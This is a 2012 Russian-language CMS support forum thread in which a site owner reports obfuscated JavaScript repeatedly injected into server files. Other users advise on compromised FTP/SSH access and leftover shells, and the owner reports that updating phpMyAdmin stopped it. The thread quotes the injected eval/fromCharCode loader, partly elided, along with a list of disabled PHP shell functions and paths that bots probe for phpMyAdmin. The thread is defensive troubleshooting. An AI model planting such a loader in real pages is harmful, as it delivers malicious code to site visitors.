araan515 3 Опубликовано: 8 марта 2012 Рассказать Опубликовано: 8 марта 2012 (изменено) 2. версия 9.5 3. отключено :apache_child_terminate, apache_getenv, apache_get_version, apache_lookup_uri, apache_note, apache_request_headers, apache_reset_timeout, apache_response_headers, apache_setenv, closelog, dbmopen, debugger_off, debugger_on, define_syslog_variables, detcwd, dl, escapeshellarg, escapeshellcmd, ftp_exec, highlight_file, ini_alter, ini_restore, leak, lin, link, listen, mysql_list_dbs, openlog, passthru, pcntl_exec, pcntl_fork, pcntl_signal, pcntl_waitpid, pcntl_wermsig, pcntl_wexitstatus, pcntl_wifexited, pcntl_wifsignaled, pcntl_wifstopped, pcntl_wstopsig, pfsockopen, popen, posix_access, posix_getpwuid, posix_kill, posix_mkfifo, posix_mknod, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, readlink, set_time_limit, shell, shell_exec, show_source, socket_accept, socket_bind, socket_creat, socket_create_listen, socket_create_pair, socket_listen, socket_select, socket_strerror, stream_select, suexec, symlink, syslog, system Максимальный размер загружаемого файла: 30.00 MB 4. Безопасный режим: Включен За последнюю неделю ежедневно несколько раз в день в файлах прописывается код, который выглядит примерно так - <script>if(window.document)try{location(12);}catch(qqq){zz='eval';aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){ss='';s=String;f='fro'+'m'+'C'+'h'+'ar';f+='Code';}ee='e';e=window[zz];t='y';}h=-2*Math.log(Math.E);n="3.5a3.5a51.5a50a15........5a28.5a3.5a3.5a61.5".split("a");for(i=0;-n.length<-i;i++){j=i;ss=ss+s[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(s)e(q);</script> Код появляется чаще всего в /index.php, main.tpl, а так же в dbconfig.php и config.php. Что примечательно - дата изменения файлов не меняется. Погуглил - подобным скриптом заражена половина ру и интернета, причем пострадали так же движки WP. Использую выделенный сервер, максимально ужаты возможности PHP, поставлена блокировка доступов кроме "белых" Ip, однако код продолжает появляться в произвольных файлах. ТП хостинга разводит руками, в логах ничего не фиксируется. Собственно вопрос - что это и как оно может такое быть? З.ы. все папки просмотрел вручную, лишних файлов нет, 80% содержимое файлов просмотрел вручную (потратил почти 4 дня). На сколько хватает опыта борьбы со взломами - подозрительного кода в файлах не нашел...Жду хоть каких-то комментариев З.з.ы. Как попасть в раздел платной ТП? лицензию я приобрел, а доступа нет Изменено 10 марта 2012 пользователем celsoft Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 999 Опубликовано: 8 марта 2012 Рассказать Опубликовано: 8 марта 2012 Код появляется чаще всего в /index.php, main.tpl, а так же в dbconfig.php и config.php. Что примечательно - дата изменения файлов не меняется. Погуглил - подобным скриптом заражена половина ру и интернета, причем пострадали так же движки WP. Потому что движки к данной проблеме отношения не имеют и искать проблемы в движках не имеет никакого смысла. У вас доступ по FTP или root доступ к серверу был украден и меняют вам файлы с использованием FTP протокала. И смотреть вам нужно либо FTP логи, либо SSH логи, либо логи доступа к панели управления сервером. http://forum.dle-new...ndpost&p=175979 http://forum.dle-new...32928&hl=iframe З.з.ы. Как попасть в раздел платной ТП? лицензию я приобрел, а доступа нет Если вы приобретали расширенную лицензию с тех. поддержкой, то вам необходимо отправить запрос в тех поддержу http://dle-news.ru/i...php?do=feedback на предоставление доступа, при этом в запросе незабудьте указать ваш логин на форуме. Цитата Ссылка на сообщение Поделиться на других сайтах
araan515 3 Опубликовано: 8 марта 2012 Рассказать Опубликовано: 8 марта 2012 Автор Потому что движки к данной проблеме отношения не имеют и искать проблемы в движках не имеет никакого смысла. У вас доступ по FTP или root доступ к серверу был украден и меняют вам файлы с использованием FTP протокала. И смотреть вам нужно либо FTP логи, либо SSH логи, либо логи доступа к панели управления сервером. Все бы ничего, НО...пароли SSH и FTP меняли неоднократно и продолжаем менять чуть ли не 2 раза в сутки, программы для использования данными доступами так же были заменены, произведена установка блокирования Ip адресов на доступы кроме "белых" используемых нами, панели управления сервером нет вообще и не было, но код все появляется и появляется...Сомневаюсь, что злоумышленник имеет такой же Ip как и у меня, иначе ни в рут, ни на фтп, ни на пхпмайадмин он попасть не может. Логи доступа так же ничего не зафиксировали... Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 999 Опубликовано: 8 марта 2012 Рассказать Опубликовано: 8 марта 2012 araan515, Из ничего, просто так не бывает. DLE не файловый менеджер, он при всем желании не может изменить эти файлы, тем более если вы как говорите в админпанель никто кроме вас не входил. Смотрите, возможны уязвимости серверного ПО и им пользуются. А логи сервера имея доступ к серверу можно и зачищать, чтобы вы ничего не видели, имея доступ к серверу, это не сложно. Сомневаюсь, что злоумышленник имеет такой же Ip как и у меня, иначе ни в рут, ни на фтп, ни на пхпмайадмин он попасть не может. Сможет, если ваш компьютер заражен троянами, он может делать это через ваш копьютер. Или компьютер того кто имеет подобные доступы. Здесь уже на форуме были случаи когда человек утверждал, что он все проверил и его компьютер никак не может быть заражен, на пяти страницах он утверждал что он гарантирует что у него все нормально, а закончилось тем, что у него был взяты все доступы к серверу, изменены тех поддержкой и ему их никто не сообщал на протяжении нескольких дней, в результате ни одного вируса. Тему искать долго, давно это было, а так бы дал вам почитать, там почти один в один то что вы пишите. Поверьте вы не один такой пользователь, таких как вы десятки пользователей, и эта проблема давно и тщательно изучена, и в данном случае проблема всегда либо со стороны серверного ПО, либо со стороны пользователя, его доступы попросту крадут или управляют его комьютером. И кстати меняет файлы даже не человек, а специальный робот, который обучен движкам и знает их файлы и структуру файлов и просто автоматом добавляет. Поэтому у вас это происходит несколько раз в день. Кстати после первой проблемы, у вас где то на сервере мог быть оставлен шелл, возможно даже не в папке с DLE,а других папках сервера, и теперь управляют через шелл. Тщательно проверьте сервер на наличие посторонних файлах. Причем проверьте везде на всех сайтах и папках на сервере. Цитата Ссылка на сообщение Поделиться на других сайтах
araan515 3 Опубликовано: 8 марта 2012 Рассказать Опубликовано: 8 марта 2012 Автор celsoft, ясно, спасибо за советы, будем искать Цитата Ссылка на сообщение Поделиться на других сайтах
araan515 3 Опубликовано: 10 марта 2012 Рассказать Опубликовано: 10 марта 2012 Автор Upd. Обновили phpmyadmin и впервые за последнюю неделю двое суток тишина и код не появляется... З.ы. прошу снести тему, или хотя бы затереть адрес площадки, дабы не навлекать на себя потенциальную угрозу в виде желающих проверить уязвимость. Спасибо Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 10 марта 2012 Рассказать Опубликовано: 10 марта 2012 Думаю тему лучше оставить, чтобы на неё можно было ссылаться с других подобных тем Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 999 Опубликовано: 10 марта 2012 Рассказать Опубликовано: 10 марта 2012 Тему оставлю безусловно, просто удалю адрес вашего сайта. Цитата Ссылка на сообщение Поделиться на других сайтах
IgorA100 90 Опубликовано: 13 марта 2012 Рассказать Опубликовано: 13 марта 2012 Обновили phpmyadmin и впервые за последнюю неделю двое суток тишина и код не появляется... Где-то неделю-две назад проскакивала информация, что найдена в нем была уязвимость и рекомендовалось обновиться. ЗЫ: Вообще, ИМХО, серверное ПО на "боевом хостинге" нужно обновлять как минимум раз в месяц, а лучше раз в неделю Цитата Ссылка на сообщение Поделиться на других сайтах
araan515 3 Опубликовано: 13 марта 2012 Рассказать Опубликовано: 13 марта 2012 (изменено) Автор Где-то неделю-две назад проскакивала информация, что найдена в нем была уязвимость и рекомендовалось обновиться. ЗЫ: Вообще, ИМХО, серверное ПО на "боевом хостинге" нужно обновлять как минимум раз в месяц, а лучше раз в неделю Снесли вообще к чертям PMA, потому как он требуется раз в год, а ставится за 2 минуты...установили доступы по определенному списку Ip, везде сменили пароли на максимально сложные, установили двойную авторизацию на админку, ну и обновили скрипт до 9.5 и тьфу-тьфу-тьфу все спокойно Изменено 13 марта 2012 пользователем araan515 1 Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 25 апреля 2012 Рассказать Опубликовано: 25 апреля 2012 Выкладываю реальные примеры запросов от ботов, которые пытаются найти на вашем сайте phpMyAdmin для дальнейшего взлома /var/www/_домен_/muieblackcat /var/www/_домен_/scripts /var/www/_домен_/admin /var/www/_домен_/admin /var/www/_домен_/admin /var/www/_домен_/db /var/www/_домен_/dbadmin /usr/share/phpMyAdmin/scripts/setup.php /var/www/_домен_/mysql /var/www/_домен_/mysqladmin /var/www/_домен_/typo3 /var/www/_домен_/phpadmin /var/www/_домен_/phpMyAdmin /var/www/_домен_/phpmyadmin /var/www/_домен_/pma /var/www/_домен_/web /var/www/_домен_/xampp /var/www/_домен_/web /var/www/_домен_/php-my-admin /var/www/_домен_/websql /var/www/_домен_/phpmyadmin /var/www/_домен_/phpMyAdmin /var/www/_домен_/phpMyAdmin-2 /var/www/_домен_/php-my-admin /var/www/_домен_/phpMyAdmin-2.2.3 /var/www/_домен_/phpMyAdmin-2.5.1 /var/www/_домен_/phpMyAdmin-2.5.4 /var/www/_домен_/phpMyAdmin-2.5.5-rc1 /var/www/_домен_/phpMyAdmin-2.5.5 /var/www/_домен_/phpMyAdmin-2.5.5-pl1 /var/www/_домен_/phpMyAdmin-2.5.6-rc1 /var/www/_домен_/phpMyAdmin-2.5.6-rc2 /var/www/_домен_/phpMyAdmin-2.5.6 /var/www/_домен_/phpMyAdmin-2.5.7 /var/www/_домен_/phpMyAdmin-2.5.7-pl1 /var/www/_домен_/phpMyAdmin-2.6.0-alpha /var/www/_домен_/phpMyAdmin-2.6.0-alpha2 /var/www/_домен_/phpMyAdmin-2.6.0-beta1 /var/www/_домен_/phpMyAdmin-2.6.0-beta2 /var/www/_домен_/phpMyAdmin-2.6.0-rc1 /var/www/_домен_/phpMyAdmin-2.6.0-rc2 /var/www/_домен_/phpMyAdmin-2.6.0-rc3 /var/www/_домен_/phpMyAdmin-2.6.0 /var/www/_домен_/phpMyAdmin-2.6.0-pl1 /var/www/_домен_/phpMyAdmin-2.6.0-pl2 /var/www/_домен_/phpMyAdmin-2.6.0-pl3 /var/www/_домен_/phpMyAdmin-2.6.1-rc1 /var/www/_домен_/phpMyAdmin-2.6.1-rc2 /var/www/_домен_/phpMyAdmin-2.6.1 /var/www/_домен_/phpMyAdmin-2.6.1-pl1 /var/www/_домен_/phpMyAdmin-2.6.1-pl2 /var/www/_домен_/phpMyAdmin-2.6.1-pl3 /var/www/_домен_/phpMyAdmin-2.6.2-rc1 /var/www/_домен_/phpMyAdmin-2.6.2-beta1 /var/www/_домен_/phpMyAdmin-2.6.2-rc1 /var/www/_домен_/phpMyAdmin-2.6.2 /var/www/_домен_/phpMyAdmin-2.6.3 /var/www/_домен_/phpMyAdmin-2.6.3-rc1 /var/www/_домен_/phpMyAdmin-2.6.3 /var/www/_домен_/phpMyAdmin-2.6.4-rc1 /var/www/_домен_/phpMyAdmin-2.6.4-pl1 /var/www/_домен_/phpMyAdmin-2.6.4-pl2 /var/www/_домен_/phpMyAdmin-2.6.4-pl3 /var/www/_домен_/phpMyAdmin-2.6.4-pl4 /var/www/_домен_/phpMyAdmin-2.6.4 /var/www/_домен_/phpMyAdmin-2.7.0-beta1 /var/www/_домен_/phpMyAdmin-2.7.0-rc1 /var/www/_домен_/phpMyAdmin-2.7.0-pl1 /var/www/_домен_/phpMyAdmin-2.7.0-pl2 /var/www/_домен_/phpMyAdmin-2.7.0 /var/www/_домен_/phpMyAdmin-2.8.0-beta1 /var/www/_домен_/phpMyAdmin-2.8.0-rc1 /var/www/_домен_/phpMyAdmin-2.8.0-rc2 /var/www/_домен_/phpMyAdmin-2.8.0 /var/www/_домен_/phpMyAdmin-2.8.0.1 /var/www/_домен_/phpMyAdmin-2.8.0.2 /var/www/_домен_/phpMyAdmin-2.8.0.3 /var/www/_домен_/phpMyAdmin-2.8.0.4 /var/www/_домен_/phpMyAdmin-2.8.1-rc1 /var/www/_домен_/phpMyAdmin-2.8.2 /var/www/_домен_/sqlmanager /var/www/_домен_/mysqlmanager /var/www/_домен_/p /var/www/_домен_/PMA2005 /var/www/_домен_/pma2005 /var/www/_домен_/phpmanager /var/www/_домен_/php-myadmin /var/www/_домен_/webadmin /var/www/_домен_/sqlweb /var/www/_домен_/websql /var/www/_домен_/webdb /var/www/_домен_/mysqladmin /var/www/_домен_/mysql-admin /var/www/_домен_/databaseadmin /var/www/_домен_/admm /var/www/_домен_/admn Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.